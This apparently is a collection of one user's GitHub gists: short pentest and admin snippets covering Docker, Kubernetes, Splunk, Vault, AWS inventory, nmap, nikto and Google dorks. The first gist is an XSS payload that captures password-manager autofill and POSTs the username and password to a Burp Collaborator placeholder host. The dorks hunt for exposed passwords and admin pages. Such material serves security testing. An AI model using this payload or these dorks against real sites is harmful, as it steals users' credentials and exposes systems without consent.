@kibelous
kibelous / capture-passwords.js
Last active September 10, 2022 17:43
[XSS] Malicious payloads
// if users use password managers to autofill credentials
<input name='username' id='username'>
<input type='password' name='password' onchange="if(this.value.length)fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net',{
method:'POST',
mode: 'no-cors',
body:username.value+':'+this.value
});">
@kibelous
kibelous / commands.sh
Last active April 28, 2021 05:54
Docker
# Remove dangling unused images
docker rmi $(docker images --filter "dangling=true" -q --no-trunc)
@kibelous
kibelous / google_dorks.sh
Last active September 21, 2022 00:18
Google Dorks
# Search for a vulnerability by CVE in BugTraq
site:www.securityfocus.com intext:CVE-2020-7059
# Other
site:.domain.com allintext:(root|admin|password)
site:.domain.com intitle:(admin|login|internal)
site:.domain.com inurl:(admin|login|logout|crm|cms)
site:.domain.com "powered by"
site:.domain.com filetype:pdf
site:.domain.com allintext:password filetype:log after:2019
# Main Splunk dir
cd /Applications/Splunk/bin
# Main URL
http://localhost:8000
# Start Splunk ES instance
./splunk start
# Stop Splunk ES instance
./splunk stop
@kibelous
kibelous / all_cmd.sh
Last active July 8, 2022 07:53
Kubernetes
# Rolling restart of a POD deployment
kubectl rollout restart deployment <deployment_name>
@kibelous
kibelous / nmap.sh
Last active June 6, 2021 08:23
Nmap
# Host Discovery (with -v, nmap also lists down hosts as "[host down]"; skip those lines)
nmap -v -sn -PE <target-CIDR> | awk '/Nmap scan report/ && !/host down/{gsub(/[()]/,"",$NF); print $NF > "nmap_scanned_ips"}'
# Aggressive scan
nmap -v -Pn -sS -A -p- -T4 --min-rate 100 -iL nmap_scanned_ips -oX nmap_synscan.xml
# Generate HTML report
xsltproc nmap_synscan.xml -o synscan.html
# Detection of service version
@kibelous
kibelous / nikto.sh
Last active December 5, 2020 06:37
Docker for Pentester
# Basic usage
docker run --rm nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:
docker run --rm -v $(pwd):/tmp nikto -h http://www.example.com -o /tmp/out.json
@kibelous
kibelous / communicate-with-vault.sh
Created August 27, 2020 08:48
Vault Commands #bash
export VAULT_CACERT=/etc/vault.d/ssl/root_CA.crt
sudo -E vault [command]
@kibelous
kibelous / all-ec2-instances.sh
Last active August 29, 2021 08:41
AWS Commands #bash
clear && echo '' && date -u '+%c %z' && echo '\nAWS - EC2 Instances\n' && aws ec2 describe-regions --query "Regions[].[RegionName]" --out text | xargs -I {} aws ec2 describe-instances --query "Reservations[].Instances[].[PrivateIpAddress,[Tags[?Key=='Name'].Value][0][0],PublicIpAddress,Placement.AvailabilityZone,LaunchTime,State.Name]" --region {} --output text | sed -E 's/[[:space:]]+/,/g' && echo '\nAWS - ELB Instances\n' && aws ec2 describe-regions --query "Regions[].[RegionName]" --out text | xargs -I {} aws elb describe-load-balancers --query "LoadBalancerDescriptions[].[DNSName,LoadBalancerName,AvailabilityZones[],CreatedTime]" --region {} --out text | sed -E 's/[[:space:]]+/,/g' | tee /dev/tty | cut -d ',' -f1 | xargs -I {} host {} | grep -v "not found"
@kibelous
kibelous / check-package-is-installed.sh
Last active December 28, 2020 08:37
Linux Audit Commands #bash
grep -i "install\|installed\|half-installed" /var/log/dpkg.log | grep <package-name>